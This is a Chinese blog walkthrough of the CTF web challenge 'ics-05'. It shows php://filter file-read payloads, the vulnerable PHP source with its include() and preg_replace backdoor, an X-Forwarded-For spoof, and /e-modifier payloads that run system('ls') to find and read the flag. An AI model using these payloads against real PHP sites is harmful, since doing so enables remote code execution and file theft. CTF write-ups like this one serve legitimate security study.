web:ics-05(本地文件包含漏洞、preg_replace函数/e漏洞、php伪协议读取文件)

最新推荐文章于 2024-04-08 21:12:02 发布
最新推荐文章于 2024-04-08 21:12:02 发布
阅读量497 收藏 2
点赞数
分类专栏: CTF-web 文章标签: 前端 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gsumall04/article/details/134715569
版权

题目

打开页面显示如下

只有这个页面能打开

显示如下

用dirsearch扫一下

查看了一下,发现没什么用

查看页面源代码

返回了,写入的参数,猜测可能有文件包含漏洞

用php伪协议读取文件

构造payload

?page=php://filter/read=convert.base64-encode/resource=index.php

显示如下

base64解码可得

<?php
error_reporting(0);

@session_start();
posix_setuid(1000);


?>
<!DOCTYPE HTML>
<html>

<head>
    <meta charset="utf-8">
    <meta name="renderer" content="webkit">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <link rel="stylesheet" href="layui/css/layui.css" media="all">
    <title>设å¤ç»´æ¤ä¸­å¿</title>
    <meta charset="utf-8">
</head>

<body>
    <ul class="layui-nav">
        <li class="layui-nav-item layui-this"><a href="?page=index">äºå¹³å°è®¾å¤ç»´æ¤ä¸­å¿</a></li>
    </ul>
    <fieldset class="layui-elem-field layui-field-title" style="margin-top: 30px;">
        <legend>设å¤å表</legend>
    </fieldset>
    <table class="layui-hide" id="test"></table>
    <script type="text/html" id="switchTpl">
        <!-- è¿éç checked çç¶æåªæ¯æ¼ç¤º -->
        <input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="å¼|å³" lay-filter="checkDemo" {{ d.id==1 0003 ? 'checked' : '' }}>
    </script>
    <script src="layui/layui.js" charset="utf-8"></script>
    <script>
    layui.use('table', function() {
        var table = layui.table,
            form = layui.form;

        table.render({
            elem: '#test',
            url: '/somrthing.json',
            cellMinWidth: 80,
            cols: [
                [
                    { type: 'numbers' },
                     { type: 'checkbox' },
                     { field: 'id', title: 'ID', width: 100, unresize: true, sort: true },
                     { field: 'name', title: '设å¤å', templet: '#nameTpl' },
                     { field: 'area', title: 'åºå' },
                     { field: 'status', title: 'ç»´æ¤ç¶æ', minWidth: 120, sort: true },
                     { field: 'check', title: '设å¤å¼å³', width: 85, templet: '#switchTpl', unresize: true }
                ]
            ],
            page: true
        });
    });
    </script>
    <script>
    layui.use('element', function() {
        var element = layui.element; //导èªçhoverææãäºçº§èåç­åè½ï¼éè¦ä¾èµelement模å
        //çå¬å¯¼èªç¹å»
        element.on('nav(demo)', function(elem) {
            //console.log(elem)
            layer.msg(elem.text());
        });
    });
    </script>

<?php

$page = $_GET[page];

if (isset($page)) {



if (ctype_alnum($page)) {
?>

    <br /><br /><br /><br />
    <div style="text-align:center">
        <p class="lead"><?php echo $page; die();?></p>
    <br /><br /><br /><br />

<?php

}else{

?>
        <br /><br /><br /><br />
        <div style="text-align:center">
            <p class="lead">
                <?php

                if (strpos($page, 'input') > 0) { //禁用了input
                    die();
                }

                if (strpos($page, 'ta:text') > 0) {
                    die();
                }

                if (strpos($page, 'text') > 0) {
                    die();
                }

                if ($page === 'index.php') {
                    die('Ok');
                }
                    include($page);
                    die();
                ?>
        </p>
        <br /><br /><br /><br />

<?php
}}


//æ¹ä¾¿çå®ç°è¾å¥è¾åºçåè½,æ­£å¨å¼å中çåè½ï¼åªè½åé¨äººåæµè¯

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') { //请求ip地址为127.0.0.1会返回welcome my admin!

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}





?>

</body>

</html>

ctype_alnum($text)函数会匹配传入参数中是否全为数字或者字母,如果是返回true,否则返回false。

strpos(string,find,start) 函数查找find在另一字符串string中第一次出现的位置(大小写敏感)。

preg_replace($pattern, $replacement, $subject)函数会将subject中匹配pattern的部分用replacement替换,如果启用/e参数的话,就会将replacement当做php代码执行。

用bp伪造xff执行

利用preg_replace函数/e漏洞

preg_replace()函数的/e漏洞
正确的php system()函数的书写

preg_replace($pattern, $replacement, $subject)
作用:搜索subject中匹配pattern的部分, 以replacement的内容进行替换。
$pattern:       要搜索的模式,可以是字符串或一个字符串数组。
$replacement:   用于替换的字符串或字符串数组。
$subject:       要搜索替换的目标字符串或字符串数组。

就是替换字符串,要使 replacement 参数是我们想要的php代码即可

代码分析

123 if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1')  //使用插件X-Forwarded-For Header改地址,
     {                                                
124 
125     echo "<br >Welcome My Admin ! <br >";
126 
127     $pattern = $_GET[pat];
128     $replacement = $_GET[rep];                      //判断三个变量存不存在,在进行perg_replace函数
129     $subject = $_GET[sub];                        
130                                 //这里的三个变量都是由我们输入,就方便多了                      
131     if (isset($pattern) && isset($replacement) && isset($subject)) {
132         preg_replace($pattern, $replacement, $subject);
133     }else{
134         die();
135     }

先测试一下

payload如下

?pat=/test/e&rep=phpinfo()&sub=test

测试成功,成功返回执行phpinfo()

构造payload

?pat=/test/e&rep=var_dump(`dir`)&sub=test
or
pat=/php/e&rep=system("ls")&sub=test

显示如下

得到目录s3chahahaDir

访问后显示如下

进入flag/,发现flag.php

直接点进去是空白的

通过伪协议读取flag.php

payload

?page=php://filter/read=convert.base64-encode/resource=s3chahahaDir/flag/flag.php

得到

base64解码,得到flag

参考文章内容

ics-05(命令执行漏洞及伪协议读取)

sleepywin
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全 | XCTF】攻防世界 ics-05 解题详析
等风来
05-31 3670
题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统。在当前目录及其子目录中查找文件名中包含 xx 的文件,如。构造Payload如下,实现将sub中的。根据提示,进入维护中心页面。查看源代码 发现注入点。
攻防世界——ics-05
m0_62063669的博客
06-21 2232
攻防世界——ics-05,打开题目场景,进入设备维护中心,将所有可点击的地方都点了一遍,发现只有设备维护中心可以打开在源代码中发现page=index写入参数,参数会在页面中显示有参数的话,可以尝试以下XSS(没有任何反应,失败)LFI(Local File Inclusion) 本地文件包含漏洞,指的是能打开并包含本地文件的漏洞 LFI漏洞的黑盒判断方法:如果只从URL判断,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键词,就可能存在文件包含漏洞。..
攻防世界web进阶区ics-05详解
hxhxhxhxx的博客
08-06 3098
攻防世界web进阶区ics-05详解题目解法 题目 我们只能点击一个地方 解法 御剑扫描有一个css的文件 没有什么作用 发现又点了一次的时候,url发生了改变 因为是php的页面,我们试试php伪协议读取文件 http://220.249.52.133:39554/index.php?page=php://filter/read=convert.base64-encode/resource=index.php <?php error_reporting(0); @session_s
攻防世界-ics-05-(详细操作)做题笔记
qq_43715020的博客
06-15 1538
攻防世界-ics-05-(详细操作)做题笔记
ics-05(命令执行漏洞伪协议读取)
Welcome To Myon'Blog !
04-13 719
攻防世界ics-05web、命令执行漏洞PHP伪协议读取源码、bp的使用、base64
慎用preg_replace危险的/e修饰符(一句话后门常用)
12-18
preg_replace函数原型: mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit]) 特别说明: /e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换...
PHP正则替换函数preg_replace和preg_replace_callback使用总结
12-18
在编写PHP模板引擎工具类时,以前常用的一个正则替换函数为 preg_replace(),加上正则修饰符 /e,就能够执行强大的回调函数,实现模板引擎编译(其实就是字符串替换)。 详情介绍参考博文:PHP函数preg_replace() ...
php中preg_replace_callback函数简单用法示例
12-19
PHP编程语言中,`preg_replace_callback`是一个非常实用的函数,它允许开发者在处理正则表达式匹配时,自定义替换的过程。这个函数的工作原理是:它接收一个模式(pattern)、一个回调函数(callback)以及一个...
php小经验:解析preg_match与preg_match_all 函数
12-19
例如,`PREG_PATTERN_ORDER`使得`matches`数组的第一个元素包含所有模式匹配的数组,而`PREG_SET_ORDER`则使`matches`数组按照匹配的顺序存放各个匹配组。 下面是一个使用`preg_match_all()`来高亮显示HTML预格式化...
【攻防世界】ics-05PHP伪协议+代码审计+Linux指令)
最新发布
2302_79800344的博客
04-08 1261
它表示在执行替换时将替换字符串作为 PHP 代码进行评估和执行。修饰符在 PHP 中已经被废弃。
ics-05(攻防世界)
m0_70819573的博客
02-25 139
3.利用X-Forwarded-For和preg_replace因/e修饰符的使用,使得replacement里的字符串可以以php代码运行。2.查看网页源码,发现在index?page=可以盲猜用伪协议php://filter读取index.php的源码。2.preg_place漏洞。1.打开环境,审计代码。
ICS-05
weixin_52921802的博客
11-19 287
编程 一、问题求解 系统分解 将问题系统地分解成多个独立的,足够小的模块(或单元),同时要求这些小单元具备可被每个程序员独立编程实现和运行的特性,我们称该机制为“系统分解”,即一个大任务被分解成了多个子任务的集合。 三种结构:顺序、条件、循环 分解后的子任务将基于特定的“结构”有机地结合在一起,完成更大地任务目标,最常见的基本构建方法是顺序、条件和循环三种结构 顺序结构 条件结构 循环结构
攻防世界(web篇)---ics-05
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-16 1086
根据提示点击进入设备维护中心(其他页面也点不开) 发现页面也没什么可以点击的地方,乱点了几下发现云平台设备维护中心是可以点击的,虽然还是同一个页面,但是多了个get参数 不可行读取源码看看直接包含发现会直接运行php文件,那我们怎么获得源码呢,很简单,include函数只会将php文件进行执行,我们只需要将传进去的文件先进行base64编码再传给它,就会输出它的内容了,也就是源码: $_SERVER[‘HTTP_X_FORWARDED_FOR’] 这个需要请求加 preg_replace /e参数
攻防世界【ics-05】解题方法
weixin_43923736的博客
06-21 824
攻防世界【ics-05】解题方法
攻防世界-ics-05
weixin_46784800的博客
11-24 2731
ics-05php伪协议题目分析:preg_replace函数漏洞php伪协议 常用方式: ?file=php://filter/read=convert.base64-encode/resource=index.php 用来查看index.php的源码。 题目分析: 进入后,点击设备维护中心(只有这一个可以点) 查看源代码,可以看见存在一个参数为page,就在“云平台设备维护中心”: 点击该处即可发现自己发现了新世界: 首先判断是否存在文件包含漏洞: /index.php?page={{1+
xctf(web)-ics-05
i_am_not_hacker的博客
08-08 900
本题的题目描述如下图所示,查看“设备维护中心” 再查看源码,也没有找到线索,通过php伪协议查看源码 php伪协议参考文章 在题目所给的url后加 ?page=php://filter/convert.base64-encode/resource=index.php 即可查到base64加密后的源码 base64解码后,查看代码,发现后门 //方便的实现输入输出的功能,正在开发中的功能,只能内部...
攻防世界-高手进阶区之ics-05
Sacrifice_li的博客
06-12 295
进来页面是: 然后用nikto 扫描了一下: 它提示说是任何一个攻击者都可以任意读取文件: 那么就尝试一下读取页面源码: index.php?page=php://filter/read=convert.base64-encode/resource=index.php 然后就去转码一下得到了: <?php error_reporting(0); @session_start(); posix_setuid(1000); ?> <!DOCTYPE HTML>
攻防世界第三道题 easy-apk
一个很酷的人
10-22 4559
⾸先我们使⽤⽼套路,⽤jeb或者dex2jar反编译后⽤jd-gui打开a,并且查看java源码,找到主类: 很明显又是⽐较字符串,将输⼊的字符串进⾏base64加密之后与 “5rFf7E2K6rqN7Hpiyush7E6S5fJg6rsi5NBf6NGT5rs=”进⾏⽐较!所以我们需要对这个字符串进⾏base64解密,但是我们去解密会发现错误: ...
攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth)WriteUp
D-R0s1的博客
08-04 4980
解题部分 题目来源 攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth) 1.拿到题目以后,发现是一个index.php的页面,并且设备…没有显示完全,此位置可疑。 2.源代码中发现?page=index,出现page这个get参数,联想到可能存在文件包含读源码的漏洞,尝试读取index.php的页面源码 通过php内置协议直接读取代码 /index.php?page=p...
php中的preg_replace函数,并举个例子
06-11
正则表达式是一种强大的字符串匹配工具,preg_replace函数可以使用正则表达式来进行字符串的替换操作。以下是一个使用preg_replace函数的例子: ```php $str = "Replace all the vowels in this string"; $pattern ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值